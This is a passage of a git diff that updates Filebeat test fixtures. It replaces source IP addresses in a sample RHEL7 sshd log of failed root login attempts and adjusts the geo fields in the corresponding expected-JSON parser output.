 Feb 22 17:02:40 slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:42 slave22 sshd[3232]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:42 slave22 sshd[3232]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:42 slave22 sshd[3232]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:42 slave22 sshd[3228]: Failed password for root from 116.31.116.27 port 30327 ssh2
+Feb 22 17:02:42 slave22 sshd[3228]: Failed password for root from 216.160.83.58 port 30327 ssh2
 Feb 22 17:02:42 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:42 slave22 sshd[3228]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:43 slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:43 slave22 sshd[3232]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:43 slave22 sshd[3232]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:44 slave22 sshd[3232]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:44 slave22 sshd[3228]: Failed password for root from 116.31.116.27 port 30327 ssh2
+Feb 22 17:02:44 slave22 sshd[3228]: Failed password for root from 216.160.83.58 port 30327 ssh2
 Feb 22 17:02:44 slave22 sshd[3228]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:44 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:45 slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:46 slave22 sshd[3232]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:46 slave22 sshd[3232]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:46 slave22 sshd[3232]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:46 slave22 sshd[3228]: Failed password for root from 116.31.116.27 port 30327 ssh2
-Feb 22 17:02:47 slave22 sshd[3228]: Received disconnect from 116.31.116.27: 11:  [preauth]
-Feb 22 17:02:47 slave22 sshd[3228]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27  user=root
+Feb 22 17:02:46 slave22 sshd[3228]: Failed password for root from 216.160.83.58 port 30327 ssh2
+Feb 22 17:02:47 slave22 sshd[3228]: Received disconnect from 216.160.83.58: 11:  [preauth]
+Feb 22 17:02:47 slave22 sshd[3228]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58  user=root
 Feb 22 17:02:47 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:48 slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:48 slave22 sshd[3232]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:48 slave22 sshd[3232]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:49 slave22 sshd[3232]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:49 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:50 slave22 sshd[3224]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:51 slave22 sshd[3232]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:51 slave22 sshd[3232]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:51 slave22 sshd[3232]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:02:51 slave22 sshd[3232]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:02:51 slave22 sshd[3232]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:02:51 slave22 sshd[3232]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:02:52 slave22 sshd[3224]: Failed password for root from 223.99.60.46 port 46820 ssh2
 Feb 22 17:02:52 slave22 sshd[3224]: Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:02:52 slave22 sshd[3224]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46  user=root
 Feb 22 17:02:52 slave22 sshd[3224]: PAM service(sshd) ignoring max retries; 6 > 3
-Feb 22 17:02:52 slave22 sshd[3244]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:02:52 slave22 sshd[3244]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:02:52 slave22 sshd[3244]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:54 slave22 sshd[3244]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:54 slave22 sshd[3244]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:54 slave22 sshd[3244]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:55 slave22 sshd[3248]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46  user=root
 Feb 22 17:02:55 slave22 sshd[3248]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:02:56 slave22 sshd[3244]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:56 slave22 sshd[3244]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:56 slave22 sshd[3244]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:02:57 slave22 sshd[3248]: Failed password for root from 223.99.60.46 port 1676 ssh2
-Feb 22 17:02:58 slave22 sshd[3244]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:02:58 slave22 sshd[3244]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:02:59 slave22 sshd[3244]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:00 slave22 sshd[3244]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:03:00 slave22 sshd[3244]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:03:00 slave22 sshd[3244]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:02 slave22 sshd[3244]: Failed password for root from 202.109.143.106 port 1140 ssh2
+Feb 22 17:03:02 slave22 sshd[3244]: Failed password for root from 202.196.224.106 port 1140 ssh2
 Feb 22 17:03:02 slave22 sshd[3244]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:03:02 slave22 sshd[3244]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:03:02 slave22 sshd[3244]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:03:02 slave22 sshd[3244]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:03:07 slave22 sshd[3248]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:09 slave22 sshd[3248]: Failed password for root from 223.99.60.46 port 1676 ssh2
@@ -868,95 +868,95 @@ Feb 22 17:03:14 slave22 sshd[3248]: Failed password for root from 223.99.60.46 p
 Feb 22 17:03:15 slave22 sshd[3248]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:18 slave22 sshd[3248]: Failed password for root from 223.99.60.46 port 1676 ssh2
 Feb 22 17:03:18 slave22 sshd[3248]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:20 slave22 sshd[3252]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:03:20 slave22 sshd[3252]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:03:20 slave22 sshd[3252]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:20 slave22 sshd[3248]: Failed password for root from 223.99.60.46 port 1676 ssh2
 Feb 22 17:03:20 slave22 sshd[3248]: Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:03:20 slave22 sshd[3248]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46  user=root
 Feb 22 17:03:20 slave22 sshd[3248]: PAM service(sshd) ignoring max retries; 6 > 3
-Feb 22 17:03:21 slave22 sshd[3252]: Failed password for root from 202.109.143.106 port 4411 ssh2
+Feb 22 17:03:21 slave22 sshd[3252]: Failed password for root from 202.196.224.106 port 4411 ssh2
 Feb 22 17:03:22 slave22 sshd[3252]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:22 slave22 sshd[3260]: Accepted publickey for tsg from 78.52.112.222 port 57936 ssh2: RSA 7c:28:53:4b:dd:5d:1e:07:77:0e:98:01:96:0d:c5:95
 Feb 22 17:03:22 slave22 sshd[3260]: pam_unix(sshd:session): session opened for user tsg by (uid=0)
-Feb 22 17:03:23 slave22 sshd[3252]: Failed password for root from 202.109.143.106 port 4411 ssh2
+Feb 22 17:03:23 slave22 sshd[3252]: Failed password for root from 202.196.224.106 port 4411 ssh2
 Feb 22 17:03:24 slave22 sshd[3252]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:26 slave22 sshd[3252]: Failed password for root from 202.109.143.106 port 4411 ssh2
+Feb 22 17:03:26 slave22 sshd[3252]: Failed password for root from 202.196.224.106 port 4411 ssh2
 Feb 22 17:03:26 slave22 sshd[3252]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:28 slave22 sshd[3252]: Failed password for root from 202.109.143.106 port 4411 ssh2
+Feb 22 17:03:28 slave22 sshd[3252]: Failed password for root from 202.196.224.106 port 4411 ssh2
 Feb 22 17:03:28 slave22 sshd[3252]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:31 slave22 sshd[3252]: Failed password for root from 202.109.143.106 port 4411 ssh2
+Feb 22 17:03:31 slave22 sshd[3252]: Failed password for root from 202.196.224.106 port 4411 ssh2
 Feb 22 17:03:31 slave22 sshd[3252]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:03:31 slave22 sshd[3252]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:03:31 slave22 sshd[3252]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:03:31 slave22 sshd[3252]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:03:33 slave22 sshd[3256]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46  user=root
 Feb 22 17:03:33 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:35 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
 Feb 22 17:03:35 slave22 sudo:     tsg : TTY=pts/0 ; PWD=/home/tsg ; USER=root ; COMMAND=/bin/cat /var/log/secure
 Feb 22 17:03:36 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:37 slave22 sshd[3298]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27  user=root
+Feb 22 17:03:37 slave22 sshd[3298]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58  user=root
 Feb 22 17:03:37 slave22 sshd[3298]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:37 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
 Feb 22 17:03:38 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:38 slave22 sshd[3298]: Failed password for root from 116.31.116.27 port 52640 ssh2
+Feb 22 17:03:38 slave22 sshd[3298]: Failed password for root from 216.160.83.58 port 52640 ssh2
 Feb 22 17:03:39 slave22 sshd[3298]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:40 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
-Feb 22 17:03:41 slave22 sshd[3298]: Failed password for root from 116.31.116.27 port 52640 ssh2
+Feb 22 17:03:41 slave22 sshd[3298]: Failed password for root from 216.160.83.58 port 52640 ssh2
 Feb 22 17:03:41 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:41 slave22 sshd[3298]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:42 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
-Feb 22 17:03:42 slave22 sshd[3298]: Failed password for root from 116.31.116.27 port 52640 ssh2
+Feb 22 17:03:42 slave22 sshd[3298]: Failed password for root from 216.160.83.58 port 52640 ssh2
 Feb 22 17:03:43 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:43 slave22 sshd[3298]: Received disconnect from 116.31.116.27: 11:  [preauth]
-Feb 22 17:03:43 slave22 sshd[3298]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27  user=root
+Feb 22 17:03:43 slave22 sshd[3298]: Received disconnect from 216.160.83.58: 11:  [preauth]
+Feb 22 17:03:43 slave22 sshd[3298]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58  user=root
 Feb 22 17:03:45 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
 Feb 22 17:03:46 slave22 sshd[3256]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:03:48 slave22 sshd[3256]: Failed password for root from 223.99.60.46 port 30094 ssh2
 Feb 22 17:03:48 slave22 sshd[3256]: Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:03:48 slave22 sshd[3256]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46  user=root
 Feb 22 17:03:48 slave22 sshd[3256]: PAM service(sshd) ignoring max retries; 6 > 3
-Feb 22 17:03:53 slave22 sshd[3317]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:03:53 slave22 sshd[3317]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:03:53 slave22 sshd[3317]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:55 slave22 sshd[3317]: Failed password for root from 202.109.143.106 port 4037 ssh2
+Feb 22 17:03:55 slave22 sshd[3317]: Failed password for root from 202.196.224.106 port 4037 ssh2
 Feb 22 17:03:55 slave22 sshd[3317]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:03:57 slave22 sshd[3317]: Failed password for root from 202.109.143.106 port 4037 ssh2
+Feb 22 17:03:57 slave22 sshd[3317]: Failed password for root from 202.196.224.106 port 4037 ssh2
 Feb 22 17:03:57 slave22 sshd[3317]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:00 slave22 sshd[3317]: Failed password for root from 202.109.143.106 port 4037 ssh2
+Feb 22 17:04:00 slave22 sshd[3317]: Failed password for root from 202.196.224.106 port 4037 ssh2
 Feb 22 17:04:00 slave22 sshd[3317]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:01 slave22 sshd[3317]: Failed password for root from 202.109.143.106 port 4037 ssh2
+Feb 22 17:04:01 slave22 sshd[3317]: Failed password for root from 202.196.224.106 port 4037 ssh2
 Feb 22 17:04:02 slave22 sshd[3313]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46  user=root
 Feb 22 17:04:02 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:02 slave22 sshd[3317]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:04 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
-Feb 22 17:04:04 slave22 sshd[3317]: Failed password for root from 202.109.143.106 port 4037 ssh2
+Feb 22 17:04:04 slave22 sshd[3317]: Failed password for root from 202.196.224.106 port 4037 ssh2
 Feb 22 17:04:04 slave22 sshd[3317]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:04:04 slave22 sshd[3317]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:04:04 slave22 sshd[3317]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:04:04 slave22 sshd[3317]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:04:04 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:07 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
 Feb 22 17:04:08 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:10 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
 Feb 22 17:04:10 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:11 slave22 sshd[3321]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:04:11 slave22 sshd[3321]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:04:11 slave22 sshd[3321]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:12 slave22 sshd[3321]: Failed password for root from 202.109.143.106 port 2592 ssh2
+Feb 22 17:04:12 slave22 sshd[3321]: Failed password for root from 202.196.224.106 port 2592 ssh2
 Feb 22 17:04:12 slave22 sshd[3321]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:13 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
 Feb 22 17:04:13 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:14 slave22 sshd[3321]: Failed password for root from 202.109.143.106 port 2592 ssh2
+Feb 22 17:04:14 slave22 sshd[3321]: Failed password for root from 202.196.224.106 port 2592 ssh2
 Feb 22 17:04:14 slave22 sshd[3321]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:15 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
-Feb 22 17:04:16 slave22 sshd[3321]: Failed password for root from 202.109.143.106 port 2592 ssh2
+Feb 22 17:04:16 slave22 sshd[3321]: Failed password for root from 202.196.224.106 port 2592 ssh2
 Feb 22 17:04:16 slave22 sshd[3313]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:16 slave22 sshd[3321]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:18 slave22 sshd[3313]: Failed password for root from 223.99.60.46 port 57812 ssh2
 Feb 22 17:04:18 slave22 sshd[3313]: Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:04:18 slave22 sshd[3313]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46  user=root
 Feb 22 17:04:18 slave22 sshd[3313]: PAM service(sshd) ignoring max retries; 6 > 3
-Feb 22 17:04:19 slave22 sshd[3321]: Failed password for root from 202.109.143.106 port 2592 ssh2
+Feb 22 17:04:19 slave22 sshd[3321]: Failed password for root from 202.196.224.106 port 2592 ssh2
 Feb 22 17:04:19 slave22 sshd[3321]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:21 slave22 sshd[3321]: Failed password for root from 202.109.143.106 port 2592 ssh2
+Feb 22 17:04:21 slave22 sshd[3321]: Failed password for root from 202.196.224.106 port 2592 ssh2
 Feb 22 17:04:21 slave22 sshd[3321]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:04:21 slave22 sshd[3321]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:04:21 slave22 sshd[3321]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:04:21 slave22 sshd[3321]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:04:29 slave22 sshd[3325]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46  user=root
 Feb 22 17:04:29 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
@@ -964,37 +964,37 @@ Feb 22 17:04:30 slave22 sshd[3325]: Failed password for root from 223.99.60.46 p
 Feb 22 17:04:31 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:33 slave22 sshd[3325]: Failed password for root from 223.99.60.46 port 33646 ssh2
 Feb 22 17:04:34 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:35 slave22 sshd[3333]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27  user=root
+Feb 22 17:04:35 slave22 sshd[3333]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58  user=root
 Feb 22 17:04:35 slave22 sshd[3333]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:35 slave22 sshd[3329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:04:35 slave22 sshd[3329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:04:35 slave22 sshd[3329]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:36 slave22 sshd[3325]: Failed password for root from 223.99.60.46 port 33646 ssh2
-Feb 22 17:04:36 slave22 sshd[3333]: Failed password for root from 116.31.116.27 port 37886 ssh2
-Feb 22 17:04:36 slave22 sshd[3329]: Failed password for root from 202.109.143.106 port 3203 ssh2
+Feb 22 17:04:36 slave22 sshd[3333]: Failed password for root from 216.160.83.58 port 37886 ssh2
+Feb 22 17:04:36 slave22 sshd[3329]: Failed password for root from 202.196.224.106 port 3203 ssh2
 Feb 22 17:04:37 slave22 sshd[3333]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:37 slave22 sshd[3329]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:37 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:39 slave22 sshd[3333]: Failed password for root from 116.31.116.27 port 37886 ssh2
-Feb 22 17:04:39 slave22 sshd[3329]: Failed password for root from 202.109.143.106 port 3203 ssh2
+Feb 22 17:04:39 slave22 sshd[3333]: Failed password for root from 216.160.83.58 port 37886 ssh2
+Feb 22 17:04:39 slave22 sshd[3329]: Failed password for root from 202.196.224.106 port 3203 ssh2
 Feb 22 17:04:39 slave22 sshd[3325]: Failed password for root from 223.99.60.46 port 33646 ssh2
 Feb 22 17:04:39 slave22 sshd[3333]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:39 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 17:04:40 slave22 sshd[3329]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:41 slave22 sshd[3333]: Failed password for root from 116.31.116.27 port 37886 ssh2
+Feb 22 17:04:41 slave22 sshd[3333]: Failed password for root from 216.160.83.58 port 37886 ssh2
 Feb 22 17:04:42 slave22 sshd[3325]: Failed password for root from 223.99.60.46 port 33646 ssh2
-Feb 22 17:04:42 slave22 sshd[3333]: Received disconnect from 116.31.116.27: 11:  [preauth]
-Feb 22 17:04:42 slave22 sshd[3333]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27  user=root
+Feb 22 17:04:42 slave22 sshd[3333]: Received disconnect from 216.160.83.58: 11:  [preauth]
+Feb 22 17:04:42 slave22 sshd[3333]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58  user=root
 Feb 22 17:04:42 slave22 sshd[3325]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:42 slave22 sshd[3329]: Failed password for root from 202.109.143.106 port 3203 ssh2
+Feb 22 17:04:42 slave22 sshd[3329]: Failed password for root from 202.196.224.106 port 3203 ssh2
 Feb 22 17:04:44 slave22 sshd[3325]: Failed password for root from 223.99.60.46 port 33646 ssh2
 Feb 22 17:04:44 slave22 sshd[3325]: Disconnecting: Too many authentication failures for root [preauth]
 Feb 22 17:04:44 slave22 sshd[3325]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46  user=root
 Feb 22 17:04:44 slave22 sshd[3325]: PAM service(sshd) ignoring max retries; 6 > 3
 Feb 22 17:04:44 slave22 sshd[3329]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:46 slave22 sshd[3329]: Failed password for root from 202.109.143.106 port 3203 ssh2
+Feb 22 17:04:46 slave22 sshd[3329]: Failed password for root from 202.196.224.106 port 3203 ssh2
 Feb 22 17:04:47 slave22 sshd[3329]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 17:04:48 slave22 sshd[3329]: Failed password for root from 202.109.143.106 port 3203 ssh2
+Feb 22 17:04:48 slave22 sshd[3329]: Failed password for root from 202.196.224.106 port 3203 ssh2
 Feb 22 17:04:49 slave22 sshd[3329]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 17:04:49 slave22 sshd[3329]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106  user=root
+Feb 22 17:04:49 slave22 sshd[3329]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106  user=root
 Feb 22 17:04:49 slave22 sshd[3329]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 17:04:51 slave22 sudo:     tsg : TTY=pts/0 ; PWD=/home/tsg ; USER=root ; COMMAND=/bin/cp /var/log/secure .
diff --git a/filebeat/module/system/auth/test/secure-rhel7.log-expected.json b/filebeat/module/system/auth/test/secure-rhel7.log-expected.json
index d6319b0e82a1..e5dbba8c56f3 100644
--- a/filebeat/module/system/auth/test/secure-rhel7.log-expected.json
+++ b/filebeat/module/system/auth/test/secure-rhel7.log-expected.json
@@ -23,22 +23,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 28.55,
-        "source.geo.location.lon": 115.9333,
-        "source.geo.region_iso_code": "CN-JX",
-        "source.geo.region_name": "Jiangxi",
-        "source.ip": "202.109.143.106",
+        "source.geo.country_iso_code": "PH",
+        "source.geo.country_name": "Philippines",
+        "source.geo.location.lat": 13.0,
+        "source.geo.location.lon": 122.0,
+        "source.ip": "202.196.224.106",
         "source.port": 1786,
         "system.auth.ssh.event": "Failed",
         "system.auth.ssh.method": "password",
@@ -89,22 +85,18 @@
             "slave22"
         ],
         "related.ip": [
-            "202.109.143.106"
+            "202.196.224.106"
         ],
         "related.user": [
             "root"
         ],
         "service.type": "system",
-        "source.as.number": 4134,
